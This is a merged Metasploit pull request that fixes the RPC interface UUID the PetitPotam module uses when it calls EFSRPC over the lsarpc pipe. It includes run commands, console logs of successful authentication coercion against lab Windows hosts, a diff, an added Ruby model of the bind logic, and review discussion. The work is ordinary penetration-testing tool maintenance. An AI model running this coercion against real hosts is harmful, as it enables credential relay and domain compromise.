
Fix PetitPotam UUID when using EfsRPC with lsarpc named pipe #19833

Merged
merged 2 commits into from
Jan 27, 2025

Conversation

cdelafuente-r7

According to 3.1.4.2 EFSRPC Interface, the UUID to bind to is different according to which server interface is used:

These calls are received at the well-known endpoint of the named pipe \pipe\lsarpc or \pipe\efsrpc. The server interface for \pipe\lsarpc MUST be identified by UUID [c681d488-d850-11d0-8c52-00c04fd90f7e], version 1.0. The server interface for \pipe\efsrpc MUST be identified by UUID [df1941c5-fe89-4e79-bf10-463657acf44d], version 1.0.

The current implementation of PetitPotam uses the LsaRPC UUID (12345778-1234-abcd-ef00-0123456789ab) when EfsRPC is used with the lsarpc named pipe. It should be c681d488-d850-11d0-8c52-00c04fd90f7e instead.

This PR fixes this by adding a specific class (EfsrpcOverLsarpc), overriding the UUID constant.

Verification

  • Start msfconsole
  • use auxiliary/scanner/dcerpc/petitpotam
  • run verbose=true rhosts=<remote host> SMBUser=<username> SMBPass=<password> SMBDomain=<domain if needed>
  • Verify you get the message Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful

Before this fix

msf6 auxiliary(scanner/dcerpc/petitpotam) > run verbose=true rhosts=192.168.232.111 SMBUser=msfuser SMBPass=123456 SMBDomain=newlab.local
[*] 192.168.232.111:445   - Binding to 12345778-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.232.111[\lsarpc] ...
[*] 192.168.232.111:445   - Bound to 12345778-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:192.168.232.111[\lsarpc] ...
[*] 192.168.232.111:445   - Attempting to coerce authentication via EfsRpcOpenFileRaw
[*] 192.168.232.111:445   - Error: 192.168.232.111: RubySMB::Dcerpc::Error::FaultError A fault occurred
[*] 192.168.232.111:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

After the fix

msf6 auxiliary(scanner/dcerpc/petitpotam) > run verbose=true rhosts=192.168.232.111 SMBUser=msfuser SMBPass=123456 SMBDomain=newlab.local
[*] 192.168.232.111:445   - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.232.111[\lsarpc] ...
[*] 192.168.232.111:445   - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.232.111[\lsarpc] ...
[*] 192.168.232.111:445   - Attempting to coerce authentication via EfsRpcOpenFileRaw
[*] 192.168.232.111:445   - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.232.111:445   - Attempting to coerce authentication via EfsRpcEncryptFileSrv
[+] 192.168.232.111:445   - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.232.111:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
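The description above explains that the interface UUID depends on which named pipe carries the EFSRPC call, and the before/after output shows the bind succeeding in both cases while only the corrected UUID lets the call dispatch. The following is an added example, not code from the PR or from RubySMB: the three UUIDs are the ones quoted on the page, while the pipe-to-interface registry, the per-interface method lists and the `simulate_call` model are constructed to illustrate why a bind to the LSARPC interface succeeds on `\pipe\lsarpc` yet faults on an EFSRPC method.

```ruby
# Added example, not code from the PR or from RubySMB: a small model of
# why the pre-fix bind succeeded yet the EFSRPC call faulted. The UUIDs
# are the ones quoted on the page; the pipe/interface registry and the
# method names per interface are a constructed subset, not the full spec.
EFSRPC_UUID             = 'df1941c5-fe89-4e79-bf10-463657acf44d' # \pipe\efsrpc
EFSRPC_OVER_LSARPC_UUID = 'c681d488-d850-11d0-8c52-00c04fd90f7e' # \pipe\lsarpc
LSARPC_UUID             = '12345778-1234-abcd-ef00-0123456789ab' # LSARPC itself

# Which interfaces each pipe serves (constructed; only what the page covers).
PIPE_INTERFACES = {
  'lsarpc' => [LSARPC_UUID, EFSRPC_OVER_LSARPC_UUID],
  'efsrpc' => [EFSRPC_UUID]
}.freeze

# Which methods each interface dispatches (constructed subset).
EFSRPC_METHODS = %w[EfsRpcOpenFileRaw EfsRpcEncryptFileSrv].freeze
INTERFACE_METHODS = {
  LSARPC_UUID => %w[LsarOpenPolicy2 LsarQueryInformationPolicy],
  EFSRPC_OVER_LSARPC_UUID => EFSRPC_METHODS,
  EFSRPC_UUID => EFSRPC_METHODS
}.freeze

# Interface UUID a client must bind for EFSRPC calls on the given pipe
# (MS-EFSR 3.1.4.2, as quoted in the PR description). Only the two pipes
# the quoted spec names are handled here.
def efsrpc_uuid_for(pipe)
  case pipe.to_s.downcase.delete_prefix('\\')
  when 'efsrpc' then EFSRPC_UUID
  when 'lsarpc' then EFSRPC_OVER_LSARPC_UUID
  else raise ArgumentError, "EFSRPC is not served on \\pipe\\#{pipe}"
  end
end

# Endpoint string in the form the module logs ("Binding to ...").
def binding_string(uuid, host, pipe)
  "#{uuid}:1.0@ncacn_np:#{host}[\\#{pipe}]"
end

# Server-side view of bind followed by a call.
# Returns :bind_rejected (UUID not served on that pipe), :fault (bound, but
# the interface has no such method) or :ok (call dispatched).
def simulate_call(pipe, uuid, method)
  return :bind_rejected unless PIPE_INTERFACES.fetch(pipe, []).include?(uuid)
  return :fault unless INTERFACE_METHODS.fetch(uuid).include?(method)
  :ok
end
```

Binding LSARPC_UUID on `lsarpc` and then calling `EfsRpcOpenFileRaw` yields `:fault`, matching the pre-fix `FaultError`; binding `efsrpc_uuid_for('lsarpc')` yields `:ok`.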

@@ -9,6 +9,12 @@
require 'ruby_smb/dcerpc/lsarpc'
require 'ruby_smb/dcerpc/efsrpc'

module RubySMB::Dcerpc::EfsrpcOverLsarpc
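Review bot: `module RubySMB::Dcerpc::EfsrpcOverLsarpc` reopens the RubySMB library's namespace from inside a Metasploit module file, so a constant that exists only for this module's lsarpc case becomes visible (and collidable) for every other module that loads RubySMB::Dcerpc. Since the override is specific to petitpotam, nest it inside the MetasploitModule class instead, or, if it is meant to be shared, add it to RubySMB itself alongside `ruby_smb/dcerpc/efsrpc`.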

If we want this to be accessible from RubySMB then we should probably move it there. I think this is more of an edge case for petitpotam though, so it may make more sense to just define an EfsrpcOverLsarpc module in the MetasploitModule class to avoid altering the global namespace.

cdelafuente-r7 (author), Jan 27, 2025


Yes, it makes sense. I've addressed this in b3c2ae4. Thank you!

@bwatters-r7

New and Improved:

msf6 auxiliary(scanner/dcerpc/petitpotam) > show options

Module options (auxiliary/scanner/dcerpc/petitpotam):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LISTENER   10.5.135.201     yes       The host listening for the incoming connection
   METHOD     Automatic        yes       The RPC method to use for triggering (Accepted: Automatic, EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv, EfsRpcDecryptF
                                         ileSrv, EfsRpcQueryUsersOnFile, EfsRpcQueryRecoveryAgents)
   PIPE       lsarpc           yes       The named pipe to use for triggering (Accepted: lsarpc, efsrpc, samr, lsass, netlogon)
   RHOSTS     10.5.134.180     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    v3Mpassword      no        The password for the specified username
   SMBUser    Administrator    no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/dcerpc/petitpotam) > run
[*] 10.5.134.180:445      - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:10.5.134.180[\lsarpc] ...
[*] 10.5.134.180:445      - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:10.5.134.180[\lsarpc] ...
[*] 10.5.134.180:445      - Attempting to coerce authentication via EfsRpcOpenFileRaw
[+] 10.5.134.180:445      - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 10.5.134.180:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) >

Old and busted:

msf6 auxiliary(scanner/dcerpc/petitpotam) > show options

Module options (auxiliary/scanner/dcerpc/petitpotam):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LISTENER   10.5.135.201     yes       The host listening for the incoming connection
   METHOD     Automatic        yes       The RPC method to use for triggering (Accepted: Automatic, EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv, EfsRpcDecryptF
                                         ileSrv, EfsRpcQueryUsersOnFile, EfsRpcQueryRecoveryAgents)
   PIPE       lsarpc           yes       The named pipe to use for triggering (Accepted: lsarpc, efsrpc, samr, lsass, netlogon)
   RHOSTS     10.5.134.180     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    v3Mpassword      no        The password for the specified username
   SMBUser    Administrator    no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/dcerpc/petitpotam) > run
[*] 10.5.134.180:445      - Binding to 12345778-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:10.5.134.180[\lsarpc] ...
[*] 10.5.134.180:445      - Bound to 12345778-1234-abcd-ef00-0123456789ab:1.0@ncacn_np:10.5.134.180[\lsarpc] ...
[*] 10.5.134.180:445      - Attempting to coerce authentication via EfsRpcOpenFileRaw
[*] 10.5.134.180:445      - Error: 10.5.134.180: RubySMB::Dcerpc::Error::FaultError A fault occurred
[*] 10.5.134.180:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) >

@smcintyre-r7 smcintyre-r7 left a comment


metasploit-framework (S:0 J:0) auxiliary(scanner/dcerpc/petitpotam) > run
[*] 192.168.159.10:445    - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.10[\lsarpc] ...
[*] 192.168.159.10:445    - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.10[\lsarpc] ...
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcOpenFileRaw
[*] 192.168.159.10:445    - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcEncryptFileSrv
[+] 192.168.159.10:445    - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
metasploit-framework (S:0 J:0) auxiliary(scanner/dcerpc/petitpotam) > 

@smcintyre-r7 smcintyre-r7 merged commit 936e0df into rapid7:master Jan 27, 2025
37 checks passed
@smcintyre-r7

Release Notes

This fixes an issue with the petitpotam module where in the default configuration, an incorrect service UUID was being used.
